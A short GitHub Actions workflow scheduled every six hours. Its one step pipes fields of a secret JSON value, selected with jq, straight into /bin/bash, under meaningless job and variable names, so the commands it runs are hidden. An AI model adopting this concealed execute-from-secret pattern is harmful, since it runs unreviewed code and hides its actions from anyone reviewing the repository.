name: caiweiccc
on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caiweiccc
        env:
          h5667: ${{ secrets.h5667 }}
        run: |
          echo $h5667 | jq -r .cj10 | /bin/bash
          echo $uon12 | jq -r .rqfeg39 | /bin/bash
          echo $dv39504 | jq -r .pznw0 | /bin/bash
          echo $ctds137 | jq -r .mgh23 | /bin/bash
          echo $zvq99921 | jq -r .opzf884 | /bin/bash

